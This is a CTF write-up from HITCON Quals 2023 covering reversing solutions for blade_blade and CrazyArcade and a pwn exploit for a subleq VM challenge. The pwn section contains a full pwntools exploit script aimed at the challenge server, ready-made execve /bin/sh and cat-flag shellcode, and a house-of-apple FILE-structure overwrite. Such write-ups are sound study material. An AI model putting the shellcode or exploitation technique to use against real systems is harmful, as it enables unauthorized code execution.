hitcon-quals-2023

Learned a lot from this game and other players from Maltese Prison Escapees. But sadly, though I can solve some challenges, other players are so quick that I got zero pts in this game. Guess I need to try harder next time. Here are the writeups for those challenges I solved (or almost solved) in this game.

blade_blade

It is a seccomp shell implemented using rust lang where we can execute several commands. After some checks, I found a flag command that calls the seccomp_shell::shell::verify function.

This function has a huge loop to shuffle and encode the input flag.

First, there are a few code blocks below to do flag shuffles.

The last part of the loop does something different.

This loop does a byte-to-byte encode, so there is a smart way to map all printable chars with encoded bytes.

It transfers some shellcode for the client to execute several times every time the server embeds the (shuffled) input and the final result into the shellcode. As shown in the picture, the input is put at!RA\x11, and the result is placed at DEADBEEF.

CrazyArcade

It’s a game but with a driver to communicate with. All communications use DeviceIoControl. It first gets 0x584 bytes from the driver and stores it into qword_7FF76B286248.

Then, it sends 37 bytes to the driver, the initial value of our flag.

In xrefs to DeviceIoControl, we can find another position where the program communicates with the driver.

The function here hits when we kill a bot in the game. Every time it gets a byte from the driver, do some calculations and send it back. The limit here is 0x1337. So we get our solution.

res = b'\xb7\x8a\x19\x7fT-\x81\xf0\xb8\xdd\xca\xc9\xd3\xc3#2\xbaA\x81\xab\x02S\xc9.\xd6~ \xad\xab\xed\x95\xd2\xb6\xe7*\x92>'
data=[0x48, 0x89, 0x54, 0x24, 0x10, 0x53, 0x57, 0x48, 0x83, 0xEC, 0x48, 0x48, 0x8B, 0xFA, 0x33, 0xDB, 0x89, 0x5F, 0x30, 0x48, 0x89, 0x5F, 0x38, 0x48, 0x8B, 0x87, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x57, 0x18, 0x8B, 0x50, 0x10, 0x44, 0x8B, 0x48, 0x08, 0x80, 0x38, 0x0E, 0x0F, 0x85, 0x3B, 0x05, 0x00, 0x00, 0x8B, 0x40, 0x18, 0x05, 0x00, 0xE0, 0xFF, 0x7F, 0x83, 0xF8, 0x54, 0x0F, 0x87, 0x23, 0x05, 0x00, 0x00, 0x4C, 0x8D, 0x05, 0x86, 0x05, 0x00, 0x00, 0x49, 0x0F, 0xB6, 0x04, 0x00, 0x4C, 0x8D, 0x05, 0x2E, 0x05, 0x00, 0x00, 0x49, 0x63, 0x04, 0x80, 0x4C, 0x8D, 0x05, 0x05, 0x00, 0x00, 0x00, 0x49, 0x03, 0xC0, 0xFF, 0xE0, 0x83, 0xFA, 0x30, 0x75, 0x5F, 0x49, 0x8B, 0x4A, 0x08, 0x48, 0x85, 0xC9, 0x74, 0x4A, 0x41, 0x8B, 0x42, 0x18, 0x83, 0xE8, 0x01, 0x74, 0x25, 0x83, 0xE8, 0x01, 0x74, 0x12, 0x83, 0xE8, 0x02, 0x75, 0x27, 0x41, 0x8B, 0x42, 0x14, 0x8B, 0x04, 0x08, 0x41, 0x89, 0x42, 0x1C, 0xEB, 0x1A, 0x41, 0x8B, 0x42, 0x14, 0x0F, 0xB7, 0x04, 0x08, 0x41, 0x89, 0x42, 0x1C, 0xEB, 0x0C, 0x41, 0x8B, 0x42, 0x14, 0x0F, 0xB6, 0x04, 0x08, 0x41, 0x89, 0x42, 0x1C, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x30, 0x00, 0x00, 0x00, 0xE9, 0xAF, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xA3, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x97, 0x04, 0x00, 0x00, 0x83, 0xFA, 0x30, 0x75, 0x5F, 0x49, 0x8B, 0x52, 0x08, 0x48, 0x85, 0xD2, 0x74, 0x4A, 0x41, 0x8B, 0x42, 0x18, 0x83, 0xE8, 0x01, 0x74, 0x26, 0x83, 0xE8, 0x01, 0x74, 0x12, 0x83, 0xE8, 0x02, 0x75, 0x27, 0x41, 0x8B, 0x4A, 0x14, 0x41, 0x8B, 0x42, 0x1C, 0x89, 0x04, 0x11, 0xEB, 0x1A, 0x41, 0x8B, 0x4A, 0x14, 0x66, 0x41, 0x8B, 0x42, 0x1C, 0x66, 0x89, 0x04, 0x11, 0xEB, 0x0B, 0x41, 0x8B, 0x4A, 0x14, 0x41, 0x8A, 0x42, 0x1C, 0x88, 0x04, 0x11, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x30, 0x00, 0x00, 0x00, 0xE9, 0x3F, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x9A, 0x00, 0x00, 0xC0, 0xE9, 0x33, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x27, 0x04, 0x00, 0x00, 0x83, 0xFA, 0x30, 0x75, 0x28, 0x49, 0x8B, 0xCA, 0xE8, 0xFD, 0xFD, 0xFF, 0xFF, 0x89, 0x47, 0x30, 0x85, 0xC0, 0x7C, 0x0D, 0x48, 0xC7, 0x47, 0x38, 0x30, 0x00, 0x00, 0x00, 0xE9, 0x06, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x9A, 0x00, 0x00, 0xC0, 0xE9, 0xFA, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xEE, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x30, 0x75, 0x27, 0x49, 0x8B, 0x4A, 0x08, 0x48, 0x85, 0xC9, 0x74, 0x12, 0x41, 0x8B, 0x52, 0x10, 0xFF, 0x15, 0x71, 0x0A, 0x00, 0x00, 0x89, 0x5F, 0x30, 0xE9, 0xCE, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xC2, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xB6, 0x03, 0x00, 0x00, 0x44, 0x8B, 0xC2, 0x49, 0x8B, 0xD2, 0xE8, 0x0E, 0xFB, 0xFF, 0xFF, 0x89, 0x47, 0x30, 0x85, 0xC0, 0x7C, 0x0E, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x96, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x8A, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x72, 0x1B, 0x49, 0x8B, 0x12, 0x48, 0xB9, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x15, 0x05, 0x0A, 0x00, 0x00, 0x89, 0x47, 0x30, 0xE9, 0x6A, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x01, 0x00, 0x00, 0xC0, 0xE9, 0x5E, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1D, 0x66, 0x41, 0x8B, 0x12, 0xEC, 0x0F, 0xBE, 0xC0, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x3C, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x30, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1E, 0x66, 0x41, 0x8B, 0x12, 0x66, 0xED, 0x0F, 0xB7, 0xC0, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x0D, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x01, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1A, 0x66, 0x41, 0x8B, 0x12, 0xED, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0xE2, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xD6, 0x02, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x36, 0x41, 0x8B, 0x52, 0x04, 0x41, 0x8B, 0x0A, 0xE8, 0x28, 0xFD, 0xFF, 0xFF, 0x84, 0xC0, 0x75, 0x0C, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xB5, 0x02, 0x00, 0x00, 0x66, 0x41, 0x8B, 0x12, 0x41, 0x8A, 0x42, 0x04, 0xEE, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x9B, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x8F, 0x02, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x38, 0x41, 0x8B, 0x52, 0x04, 0x41, 0x8B, 0x0A, 0xE8, 0xE1, 0xFC, 0xFF, 0xFF, 0x84, 0xC0, 0x75, 0x0C, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x6E, 0x02, 0x00, 0x00, 0x66, 0x41, 0x8B, 0x12, 0x66, 0x41, 0x8B, 0x42, 0x04, 0x66, 0xEF, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x52, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x46, 0x02, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x36, 0x41, 0x8B, 0x52, 0x04, 0x41, 0x8B, 0x0A, 0xE8, 0x98, 0xFC, 0xFF, 0xFF, 0x84, 0xC0, 0x75, 0x0C, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x25, 0x02, 0x00, 0x00, 0x66, 0x41, 0x8B, 0x12, 0x41, 0x8B, 0x42, 0x04, 0xEF, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x0B, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xFF, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1C, 0x41, 0xC7, 0x02, 0x01, 0x00, 0x00, 0x00, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0x48, 0x89, 0x47, 0x38, 0xE9, 0xDE, 0x01, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xD2, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x35, 0x41, 0x8B, 0x02, 0x8B, 0x0D, 0x5B, 0x18, 0x00, 0x00, 0x3D, 0x00, 0x00, 0x00, 0x80, 0x0F, 0x45, 0xC8, 0x89, 0x0D, 0x4D, 0x18, 0x00, 0x00, 0x41, 0x03, 0x4A, 0x04, 0x89, 0x0D, 0x43, 0x18, 0x00, 0x00, 0x41, 0x89, 0x0A, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x98, 0x01, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x8C, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x0C, 0x75, 0x44, 0x41, 0x8B, 0x0A, 0x0F, 0x32, 0x8B, 0xCA, 0x48, 0xC1, 0xE1, 0x20, 0x48, 0x0B, 0xC8, 0x48, 0x89, 0x4C, 0x24, 0x30, 0x48, 0xC1, 0xE9, 0x20, 0x41, 0x89, 0x4A, 0x04, 0x8B, 0x44, 0x24, 0x30, 0x41, 0x89, 0x42, 0x08, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x0C, 0x00, 0x00, 0x00, 0xE9, 0x54, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x7C, 0x24, 0x68, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x43, 0x01, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x37, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x0C, 0x75, 0x3C, 0x41, 0x8B, 0x42, 0x04, 0x48, 0xC1, 0xE0, 0x20, 0x41, 0x8B, 0x4A, 0x08, 0x48, 0x0B, 0xC1, 0x48, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0x41, 0x8B, 0x0A, 0x0F, 0x30, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x0C, 0x00, 0x00, 0x00, 0xE9, 0x07, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x7C, 0x24, 0x68, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xF6, 0x00, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xEA, 0x00, 0x00, 0x00, 0x83, 0xFA, 0x18, 0x75, 0x5D, 0x41, 0x8B, 0x4A, 0x10, 0x85, 0xC9, 0x74, 0x49, 0x83, 0xF9, 0x04, 0x77, 0x44, 0x4D, 0x8D, 0x4A, 0x14, 0x45, 0x8B, 0x42, 0x08, 0x41, 0x83, 0xE0, 0x07, 0x41, 0xC1, 0xE0, 0x05, 0x41, 0x8B, 0x42, 0x04, 0x83, 0xE0, 0x1F, 0x44, 0x0B, 0xC0, 0x89, 0x4C, 0x24, 0x28, 0x41, 0x8B, 0x42, 0x0C, 0x89, 0x44, 0x24, 0x20, 0x41, 0x8B, 0x12, 0xB9, 0x04, 0x00, 0x00, 0x00, 0xFF, 0x15, 0xEF, 0x06, 0x00, 0x00, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x18, 0x00, 0x00, 0x00, 0xE9, 0x94, 0x00, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x88, 0x00, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x7F, 0x83, 0xFA, 0x18, 0x75, 0x6A, 0x41, 0x8B, 0x4A, 0x10, 0x85, 0xC9, 0x74, 0x59, 0x83, 0xF9, 0x04, 0x77, 0x54, 0x41, 0x8B, 0x52, 0x0C, 0x83, 0xFA, 0x10, 0x72, 0x0E, 0x83, 0xFA, 0x27, 0x77, 0x09, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x56, 0x4D, 0x8D, 0x4A, 0x14, 0x45, 0x8B, 0x42, 0x08, 0x41, 0x83, 0xE0, 0x07, 0x41, 0xC1, 0xE0, 0x05, 0x41, 0x8B, 0x42, 0x04, 0x83, 0xE0, 0x1F, 0x44, 0x0B, 0xC0, 0x89, 0x4C, 0x24, 0x28, 0x89, 0x54, 0x24, 0x20, 0x41, 0x8B, 0x12, 0xB9, 0x04, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x79, 0x06, 0x00, 0x00, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x18, 0x00, 0x00, 0x00, 0xEB, 0x19, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x10, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x07, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0x8B, 0x5F, 0x30, 0x32, 0xD2, 0x48, 0x8B, 0xCF, 0xFF, 0x15, 0xB5, 0x06, 0x00, 0x00, 0x8B, 0xC3, 0x48, 0x83, 0xC4, 0x48, 0x5F, 0x5B, 0xC3]

res=bytearray(res)

for offset in range(0x1337):
    res[offset%37]^=(offset^data[offset%0x584])&0xff

print(res)

lessequalmore & SUBformore

I spend a lot of time on this chall; it’s a subleq vm with plenty of instructions. I learned from this that sometimes you don’t need to understand everything to solve a chall.

It divides input into eight blocks as an 8*8 matrix and does some linear calculations. The easy way to do this is to hook the check and change the input byte by byte, monitor the value to get the coefs.

The pwn part took me a long time since implementing the div 8 operation in a VM takes a lot of work.

Our input are read and put at the start of the memory section. We can overflow the program and write into the jump table, thereby hijacking the control flow of the program.

My solution is the same as the author’s intended solution so I recommend the author’s writeup.

HITCON CTF 2023 - LessEQualmore / SUBformore

However, my teammate came up with a much easier solution — house of apple. I focused too much on jumping to the stack address, but house of apple works only with a known mem address and libc address. So here’s the solve script:

#!/usr/bin/env python3

# %%
from pwn import *
from LibcSearcher import *

exe = ELF("./lessequalmore_patched")

context.binary = exe
context.os = 'linux'
context.arch = context.binary.arch
# context.terminal = ['alacritty', '-e']
context.terminal = ['wt.exe', 'wsl', '--']

local = False
if local:
    context.log_level = 'debug'
    p = process([exe.path,"chal.txt"])
else:
    p = remote("chal-lessequalmore.chal.hitconctf.com", 11111)

def dbgaddr(addr, PIE=False):  # PIE enabled
    if local:
        if PIE:
            text_base = int(
                os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
            log.info(f'b *{hex(text_base + addr)}\n')
            gdb.attach(p, f'b *{hex(text_base + addr)}')
        else:
            gdb.attach(p, f'b *{hex(addr)}')

def dbg(func=''):
    if local:
        gdb.attach(p, func)

def main_arena():
    # from ptrlib
    ofs_stdin = libc.sym._IO_2_1_stdin_
    ofs_realloc_hook = libc.sym.__realloc_hook
    ofs_malloc_hook = libc.sym.__malloc_hook
    if ofs_realloc_hook is None \
       or ofs_malloc_hook is None \
       or ofs_stdin is None:
        return None

    if 0 < ofs_malloc_hook - ofs_stdin < 0x1000:
        # libc-2.33 or older
        if context.bits == 32:
            return ofs_malloc_hook + 0x18
        else:
            return ofs_malloc_hook + (ofs_malloc_hook - ofs_realloc_hook)*2

    else:
        # libc-2.34 removed hooks
        ofs_tzname = libc.sym.tzname
        if ofs_tzname is None:
            return None
        if context.bits == 32:
            return ofs_tzname - 0x460
        else:
            return ofs_tzname - 0x8a0

def ROL(content, key):
    # house of emma
    # ROL(gadget_addr ^ fake_pointer_guard, 0x11)
    tmp = bin(content)[2:].rjust(64, '0')
    return int(tmp[key:] + tmp[:key], 2)

# dbgaddr(0x14d2,PIE=True)
# dbg("main")
# gdb.attach(p,"b *run_program+34 if $rax==0x66")

s = lambda str: p.send(str)
sl = lambda str: p.sendline(str)
sa = lambda delims, str: p.sendafter(delims, str)
sla = lambda delims, str: p.sendlineafter(delims, str)
r = lambda numb=4096: p.recv(numb)
rl = lambda: p.recvline()
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
li = lambda str, data: log.success(str + '========>' + hex(data))

# https://www.exploit-db.com/shellcodes
execve_bin_sh = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
execveat_bin_sh = b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
cat_flag = b"\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x67\x6d\x60\x66\x01\x01\x01\x48\x31\x04\x24\x6a\x02\x58\x48\x89\xe7\x31\xf6\x99\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05"
ls_current_dir = b"\x68\x2f\x2e\x01\x01\x81\x34\x24\x01\x01\x01\x01\x48\x89\xe7\x31\xd2\xbe\x01\x01\x02\x01\x81\xf6\x01\x01\x03\x01\x6a\x02\x58\x0f\x05\x48\x89\xc7\x31\xd2\xb6\x03\x48\x89\xe6\x6a\x4e\x58\x0f\x05\x6a\x01\x5f\x31\xd2\xb6\x03\x48\x89\xe6\x6a\x01\x58\x0f\x05"

#%%
for i in range(0x56):
    sl(b"%x66")

id=0x69

def idx():
    global id
    tmp_id=id
    id+=3
    return tmp_id

sl(f"%x0\n%x0\n%{idx()}")
sl(f"%x1\n%x1\n%{idx()}")
sl(f"%xfffffffffffffffe\n%x1\n%{idx()}")
sl(f"%x1\n%x0\n%{idx()}")
sl(f"%x0\n%x53d09\n%{idx()}")
sl(f"%x0\n%x0\n%{idx()}")

sl(f"%xfffffffffffffffe\n%x0\n%{idx()}")
sl(f"%x0\n%x53d02\n%{idx()}")
sl(f"%x53cfd\n%x53cf3\n%{idx()}")
sl(f"%x0\n%x0\n%{idx()}")
sl(f"%xfffffffffffffffe\n%x0\n%{idx()}")
sl(f"%x0\n%x53cee\n%{idx()}")

sl(f"%x0\n%x0\n%{idx()}")
sl(f"%x102e6\n%x0\n%{idx()}")

sl(f"%xda\n%xda\n%{idx()}")
sl(f"%xfffffffffffffffe\n%xda\n%{idx()}")
sl(f"%x0\n%xda\n%{idx()}")

sl(f"%xeb\n%xeb\n%{idx()}")
sl(f"%xfffffffffffffffe\n%xeb\n%{idx()}")
sl(f"%x0\n%xeb\n%{idx()}")
sl(f"%x0\n%x0\n%xfffffffffffffffe")

for i in range((0x600-0x538)//8):
    sl(b"%x66")

from IO_FILE import *

file=IO_FILE_plus()
file._IO_write_base=0
file._IO_buf_base=0
payload=bytes(file)

for i in range(len(payload)//8+1):
    sl(f"%0")

for i in range(0x413-0x65-17*3-(0x600-0x538)//8-len(payload)//8-1):
    sl(b"%x66")
sl("")
#%%
sl("%xfffffffffffffac0")
sl("%x29d3a0")
# sl("%xc044b567")
sl("%xffd5df8c9a4a0867") # b"  cat *"
sl("%xfffffffffff7efc0")
sl("%x53620")
#%%
# b *run_program+34 if $rax==0x66
# ignore 1 0x411
# b *run_program+72
p.interactive()